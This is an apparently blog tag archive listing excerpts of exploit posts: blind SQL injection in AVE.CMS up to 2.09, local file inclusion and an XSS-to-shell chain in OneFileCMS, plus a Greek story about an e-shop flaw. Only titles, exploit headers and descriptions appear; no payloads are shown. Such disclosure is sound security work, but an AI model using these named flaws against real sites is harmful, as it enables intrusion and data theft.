RSS

Tag Archives: cms

AVE.CMS <= 2.09 – Remote Blind SQL Injection Exploit


The AVE.CMS versions less than 2.09 suffer from a remote blind SQL injection vulnerability in the “module” parameter. AVE.CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Read the rest of this entry »

Advertisements
 
1 Comment

Posted by on May 26, 2013 in Exploits

 

Tags: , , , ,

OneFileCMS v.1.1.5 Local File Inclusion Vulnerability


# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: —
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: https://ghostinthelab.wordpress.com/
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.
Read the rest of this entry »

 
Leave a comment

Posted by on March 16, 2012 in Exploits

 

Tags: , , ,

Η πονεμένη ιστορία ενος.. e-shop.

Ομολογουμένως, ήταν αρκετά δύσκολο να ετοιμαστεί ένα ακόμα τεχνικό άρθρο και μάλιστα μέσα στο καλοκαίρι. Έτσι σκέφτηκα, να ελαφρύνω λίγο την ατμόσφαιρα και να σας αφηγηθώ μια πραγματική ιστορία. Σε αυτό το άρθρο θα σας αφηγηθώ μια πραγματική ιστορία δύο φίλων, ενός e-shop και …ενός πολύ σοβαρού κενού ασφαλείας.

Read the rest of this entry »

 
Leave a comment

Posted by on December 5, 2011 in It's Greek to Me

 

Tags: ,

OneFileCMS v.1.1.1 – From XSS to Shell –


# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities
# Google Dork: —
# Date: 21/8/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: https://ghostinthelab.wordpress.com/http://s3cure.gr
# Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip
# Version: OneFileCMS v.1.1.1
# Tested on: Linux Fedora 14

 

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.

Read the rest of this entry »

 
1 Comment

Posted by on August 21, 2011 in Exploits

 

Tags: , , , ,